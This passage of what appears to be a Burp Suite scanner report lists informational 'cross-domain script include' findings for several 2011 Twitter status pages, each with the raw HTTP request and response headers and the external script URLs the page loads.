http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225119-26933-12549
ETag: "aaf26de7030048d1196c313150091a40"
Last-Modified: Fri, 28 Jan 2011 14:31:59 GMT
X-Runtime: 0.04519
Content-Type: text/html; charset=utf-8
Content-Length: 13678
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoMY3NyZl9pZCIlZmU4MjBhZmJhOGQ0%250AYmNiYWY5MGQ1NGFjZDk3ZTExYjQ6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--80cd1a73095b80de52be3483ee35ac58b2872ef0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.457. http://twitter.com/malsup/status/28104072506638336 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28104072506638336

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224902-83509-7686
ETag: "149ada5c80b5766764f47c9a0f52a4c1"
Last-Modified: Fri, 28 Jan 2011 14:28:22 GMT
X-Runtime: 0.06341
Content-Type: text/html; charset=utf-8
Content-Length: 13677
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoMY3NyZl9pZCIlNWNkZDU3ZjRlMjQy%250AN2Q4MTA4MmM0NDFhZDg5MjY2YzI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e0b142d583ea9a31999ba97ee4a16fb9f6b484a2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.458. http://twitter.com/malsup/status/28148269980852225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28148269980852225

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225119-97856-16873
ETag: "7b6e954d574e7f7d8067cc5a60d82990"
Last-Modified: Fri, 28 Jan 2011 14:31:59 GMT
X-Runtime: 0.05505
Content-Type: text/html; charset=utf-8
Content-Length: 13573
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE0ODI2OTk4MDg1MjIyNToMY3NyZl9pZCIlNjJkN2Q0NGJmZjQ0%250AY2Y5MzZjNDliYTEzMmRjZWJiODc6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--5b2e0612298938a13e49d0fd90127d9e47514304; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.459. http://twitter.com/malsup/status/28148269980852225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28148269980852225

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224901-67249-7024
ETag: "c7d9e91873275c60e828220131e3d24e"
Last-Modified: Fri, 28 Jan 2011 14:28:21 GMT
X-Runtime: 0.05497
Content-Type: text/html; charset=utf-8
Content-Length: 13572
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE0ODI2OTk4MDg1MjIyNToMY3NyZl9pZCIlMjhjNDM2MTNkMDIw%250ANDA2NjMwMjM2MDE1YmViMWNhOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--53ddf4f09f23d5fa1c2283d7064ce993e37290a9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.460. http://twitter.com/malsup/status/28172705220009984 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28172705220009984

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28172705220009984 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224903-20411-54978
ETag: "1d3dce7c8cc9257454fd818d254f7abb"
Last-Modified: Fri, 28 Jan 2011 14:28:23 GMT
X-Runtime: 0.29056
Content-Type: text/html; charset=utf-8
Content-Length: 13615
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjcwNTIyMDAwOTk4NDoMY3NyZl9pZCIlNDAwZTU3MDIwZTI2%250AOGRjM2FkZTAwZDZiN2FkNDkxZTY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--f11730b84ce50cbf6bd93caab79b94724f2f389a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.461. http://twitter.com/malsup/status/28172705220009984 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28172705220009984

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28172705220009984 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234495-64409-10312
ETag: "3d65003ea43235d3aa8421f1e64ab649"
Last-Modified: Fri, 28 Jan 2011 17:08:15 GMT
X-Runtime: 0.05639
Content-Type: text/html; charset=utf-8
Content-Length: 13483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjcwNTIyMDAwOTk4NDoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--5afa66a4fe336d2ca2c73e1293b7e455605f0295; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.462. http://twitter.com/malsup/status/28172927228706816 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28172927228706816

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225119-58226-51590
ETag: "164c0b016849d25829c5d763bc6e3cdf"
Last-Modified: Fri, 28 Jan 2011 14:31:59 GMT
X-Runtime: 0.04999
Content-Type: text/html; charset=utf-8
Content-Length: 13565
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoMY3NyZl9pZCIlMGRiN2M4MDc2OTg1%250ANGRhNDJlZjhkZTQ0MTFkYTdmMTQ6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--69d9a47fbb23b7bbd9a88e98c06f3fe9b4546b3c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.463. http://twitter.com/malsup/status/28172927228706816 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/28172927228706816

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234496-78221-20778
ETag: "3b0086e99e868e3e174b5f41705940db"
Last-Modified: Fri, 28 Jan 2011 17:08:16 GMT
X-Runtime: 0.05210
Content-Type: text/html; charset=utf-8
Content-Length: 13433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
